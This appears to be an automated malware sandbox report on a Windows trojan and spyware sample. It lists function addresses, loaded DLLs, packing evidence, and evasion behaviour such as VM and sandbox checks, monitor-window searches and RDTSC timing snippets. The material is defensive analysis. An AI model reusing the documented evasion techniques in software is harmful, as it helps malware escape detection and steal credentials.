Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AC6E7	5_2_005AC6E7
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004F06F0	5_2_004F06F0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B86E4	5_2_005B86E4
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051C684	5_2_0051C684
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CA681	5_2_005CA681
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005726B1	5_2_005726B1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0061868D	5_2_0061868D
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005BC6AD	5_2_005BC6AD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005946AE	5_2_005946AE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F86A3	5_2_005F86A3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062476F	5_2_0062476F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058874B	5_2_0058874B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004C2750	5_2_004C2750
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055C77B	5_2_0055C77B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00550719	5_2_00550719
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057670C	5_2_0057670C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052A722	5_2_0052A722
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062A71E	5_2_0062A71E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005367D0	5_2_005367D0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005FA7D7	5_2_005FA7D7
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A07D3	5_2_005A07D3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005387DE	5_2_005387DE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E87FD	5_2_005E87FD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005287F7	5_2_005287F7
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005627E5	5_2_005627E5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005247ED	5_2_005247ED
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B6792	5_2_005B6792
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A2784	5_2_005A2784
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004BC840	5_2_004BC840
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00530871	5_2_00530871
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058486F	5_2_0058486F
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005BC86C	5_2_005BC86C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0055A818	5_2_0055A818
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00542819	5_2_00542819
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00512801	5_2_00512801
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CE80A	5_2_005CE80A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0061A83B	5_2_0061A83B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060C804	5_2_0060C804
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F282C	5_2_005F282C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005748D7	5_2_005748D7
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052C8C2	5_2_0052C8C2
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D88CE	5_2_005D88CE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006088F5	5_2_006088F5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058E8CE	5_2_0058E8CE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005428C3	5_2_005428C3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005EC8C1	5_2_005EC8C1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005B88F8	5_2_005B88F8
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005148FB	5_2_005148FB
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005648FC	5_2_005648FC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0057E8FA	5_2_0057E8FA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005268FD	5_2_005268FD
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051E8E3	5_2_0051E8E3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D28E5	5_2_005D28E5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005828E3	5_2_005828E3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E68E0	5_2_005E68E0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0058C89C	5_2_0058C89C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C4894	5_2_005C4894
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060A8AF	5_2_0060A8AF
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005CC88A	5_2_005CC88A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005548B1	5_2_005548B1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004CC8A0	5_2_004CC8A0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F08B3	5_2_005F08B3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004E88B0	5_2_004E88B0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00540950	5_2_00540950
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005DC959	5_2_005DC959
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0060297D	5_2_0060297D
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004CE960	5_2_004CE960
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005BA915	5_2_005BA915
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004D6910	5_2_004D6910
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00600900	5_2_00600900
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0059293A	5_2_0059293A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00516937	5_2_00516937
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0062C90A	5_2_0062C90A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00580928	5_2_00580928
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00566924	5_2_00566924
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C6926	5_2_005C6926
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0053A9C3	5_2_0053A9C3
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0061E9F0	5_2_0061E9F0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005609CB	5_2_005609CB
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004DC9EB	5_2_004DC9EB
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006669CC	5_2_006669CC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004F09E0	5_2_004F09E0
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005D099E	5_2_005D099E
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005FC994	5_2_005FC994
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006289AC	5_2_006289AC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005AE98B	5_2_005AE98B
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_006049BF	5_2_006049BF
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005489B1	5_2_005489B1
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005A49B2	5_2_005A49B2
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005C09B5	5_2_005C09B5
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0051C9BE	5_2_0051C9BE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E49AA	5_2_005E49AA
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005709AB	5_2_005709AB
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005329AC	5_2_005329AC
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00616A67	5_2_00616A67
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_004ECA40	5_2_004ECA40
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005F8A45	5_2_005F8A45
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00590A77	5_2_00590A77
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0066AA58	5_2_0066AA58
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0052EA6D	5_2_0052EA6D
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_005E2A61	5_2_005E2A61
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00620A30	5_2_00620A30
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00530A0C	5_2_00530A0C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0059CA38	5_2_0059CA38
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00550A28	5_2_00550A28

Source: ZX2M0AXZ56.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ZX2M0AXZ56.exe

Static PE information: Section: ZLIB complexity 0.9996042687908496

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@1/1

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Code function: 5_2_004E2070 CoCreateInstance,

5_2_004E2070

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: ZX2M0AXZ56.exe, 00000005.00000003.1406189422.000000000532A000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1885943325.0000000005334000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1885840523.0000000005341000.00000004.00000800.00020000.00000000.sdmp, ZX2M0AXZ56.exe, 00000005.00000003.1406067939.0000000005346000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ZX2M0AXZ56.exe	Virustotal: Detection: 56%
Source: ZX2M0AXZ56.exe	ReversingLabs: Detection: 64%

Source: ZX2M0AXZ56.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: ZX2M0AXZ56.exe	String found in binary or memory: RtlAllocateHeap3Cannot find '%s'. Please, re-install this applicationThunRTMain__vbaVarTstNeR

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

File read: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: ZX2M0AXZ56.exe

Static file information: File size 2964992 > 1048576

Source: ZX2M0AXZ56.exe

Static PE information: Raw size of zaxvzjyx is bigger than: 0x100000 < 0x2aa200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Unpacked PE file: 5.2.ZX2M0AXZ56.exe.4b0000.0.unpack :EW;.rsrc :W;.idata :W;zaxvzjyx:EW;iydnotcx:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;zaxvzjyx:EW;iydnotcx:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: ZX2M0AXZ56.exe

Static PE information: real checksum: 0x2e0558 should be: 0x2d9c23

Source: ZX2M0AXZ56.exe	Static PE information: section name:
Source: ZX2M0AXZ56.exe	Static PE information: section name: .rsrc
Source: ZX2M0AXZ56.exe	Static PE information: section name: .idata
Source: ZX2M0AXZ56.exe	Static PE information: section name: zaxvzjyx
Source: ZX2M0AXZ56.exe	Static PE information: section name: iydnotcx
Source: ZX2M0AXZ56.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_3_053207E7 push ds; iretd	5_3_0532092C
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050805A push ebx; mov dword ptr [esp], edi	5_2_00508677
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050C077 push ebx; mov dword ptr [esp], edi	5_2_0050E694
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00510066 push ecx; mov dword ptr [esp], 77F566EBh	5_2_0051006A
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050C06D push edi; mov dword ptr [esp], 7F77AB11h	5_2_0050E7BE
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050C00B push edi; mov dword ptr [esp], ebx	5_2_0050FC92
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050C00B push edx; mov dword ptr [esp], eax	5_2_00510346
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050E03F push 5C9238A1h; mov dword ptr [esp], ebp	5_2_0050E046
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050E03F push ebx; mov dword ptr [esp], eax	5_2_00510553
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_0050C0F6 push ebp; mov dword ptr [esp], eax	5_2_0050C0FF
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push eax; mov dword ptr [esp], ebp	5_2_00572458
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push esi; mov dword ptr [esp], ebx	5_2_00572467
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push esi; mov dword ptr [esp], ecx	5_2_005724E6
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push ebp; mov dword ptr [esp], ecx	5_2_00572519
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push 7D09D437h; mov dword ptr [esp], edx	5_2_00572521
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Code function: 5_2_00572097 push esi; mov dword ptr [esp], eax	5_2_0057265F

Source: ZX2M0AXZ56.exe

Static PE information: section name: entropy: 7.982480697564679

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 5094C3 second address: 5094F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34C1F676h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3B34C1F673h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 68275B second address: 68276A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3B34E245FBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 67D193 second address: 67D197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 67D197 second address: 67D19B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 67D19B second address: 67D1A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 681BE9 second address: 681BEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 681BEF second address: 681BF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 681BF3 second address: 681C29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F3B34E245F8h 0x0000000c jmp 00007F3B34E24602h 0x00000011 popad 0x00000012 push ebx 0x00000013 jbe 00007F3B34E245FEh 0x00000019 pushad 0x0000001a popad 0x0000001b jns 00007F3B34E245F6h 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pop ecx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 681D72 second address: 681D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F3B34C1F666h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 68484E second address: 684852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684852 second address: 684856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684856 second address: 68485C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 68485C second address: 684862 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 684862 second address: 684866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZX2M0AXZ56.exe	RDTSC instruction interceptor: First address: 6848DE second address: 6848E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F3B34C1F666h 0x0000000a rdtsc
